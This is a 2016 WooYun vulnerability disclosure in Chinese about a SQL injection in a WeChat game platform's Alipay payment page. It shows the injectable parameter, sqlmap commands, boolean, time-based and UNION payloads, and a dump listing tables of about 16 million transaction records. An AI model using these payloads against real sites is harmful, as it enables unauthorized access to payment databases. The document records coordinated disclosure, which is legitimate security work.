当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203207

漏洞标题:游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)

相关厂商:游光网络

漏洞作者: 我在不想理你

提交时间:2016-05-02 10:20

修复时间:2016-06-20 19:40

公开时间:2016-06-20 19:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

RT

详细说明:

http://**.**.**.**/


游光网络是微信游戏比较火的开发商,允许微信不用注册直接登录玩,目前比较火的游戏有 怪兽必须死 勇士之塔 三国浮生记 都允许用微信直接支付充值 我查看了一下交易记录 每一秒都有7/8单充值记录 虽然都是小金额2块5块,但是一天下来收入统计还是很可观
注入点在web充值页面

http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8


放sqlmap跑

sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:46:06
[20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:46:08] [INFO] resuming back-end DBMS 'mysql'
[20:46:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:46:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库

sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:47:00
[20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:47:01] [INFO] resuming back-end DBMS 'mysql'
[20:47:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:47:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[20:47:01] [INFO] fetching tables for database: 'money'
[20:47:01] [INFO] the SQL query used returns 19 entries
[20:47:01] [INFO] resumed: channel_tradeno
[20:47:01] [INFO] resumed: cp_trans
[20:47:01] [INFO] resumed: distr_stat
[20:47:01] [INFO] resumed: distr_sum
[20:47:01] [INFO] resumed: game_v2
[20:47:01] [INFO] resumed: marchant
[20:47:01] [INFO] resumed: mch_func_priv
[20:47:01] [INFO] resumed: mch_games
[20:47:01] [INFO] resumed: mch_priv
[20:47:01] [INFO] resumed: online
[20:47:01] [INFO] resumed: product_sum
[20:47:01] [INFO] resumed: product_v2
[20:47:01] [INFO] resumed: register
[20:47:01] [INFO] resumed: sum
[20:47:01] [INFO] resumed: talking_data_result
[20:47:01] [INFO] resumed: trans
[20:47:01] [INFO] resumed: trans_back
[20:47:01] [INFO] resumed: user_channel_sum
[20:47:01] [INFO] resumed: user_channel_trans
Database: money
[19 tables]
+---------------------+
| sum |
| channel_tradeno |
| cp_trans |
| distr_stat |
| distr_sum |
| game_v2 |
| marchant |
| mch_func_priv |
| mch_games |
| mch_priv |
| online |
| product_sum |
| product_v2 |
| register |
| talking_data_result |
| trans |
| trans_back |
| user_channel_sum |
| user_channel_trans |
+---------------------+
[20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: money
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| trans | 16486615 |
| trans_back | 14759999 |
| online | 7397218 |
| cp_trans | 113319 |
| product_sum | 27005 |
| `sum` | 15403 |
| talking_data_result | 11257 |
| user_channel_sum | 3924 |
| distr_sum | 2431 |
| channel_tradeno | 1776 |
| product_v2 | 687 |
| distr_stat | 571 |
| mch_games | 150 |
| game_v2 | 89 |
| marchant | 78 |
| register | 45 |
| mch_priv | 5 |
| mch_func_priv | 1 |
+---------------------+---------+


1600W交易记录

修复方案:

过滤

版权声明:转载请注明来源 我在不想理你@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-06 19:37

厂商回复:

CNVD未直接确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-02 10:44 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

    你没治了

  2. 2016-05-02 14:18 | 我在不想理你 ( 普通白帽子 | Rank:186 漏洞数:60 | 人生路漫漫)

    @sauce 第一次上头条

  3. 2016-05-02 15:52 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    呵呵 洞主可以来我的一个交流群探讨一下。

  4. 2016-05-02 16:10 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业!)

    火速留名

  5. 2016-05-02 17:55 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @我在不想理你 原来在这啊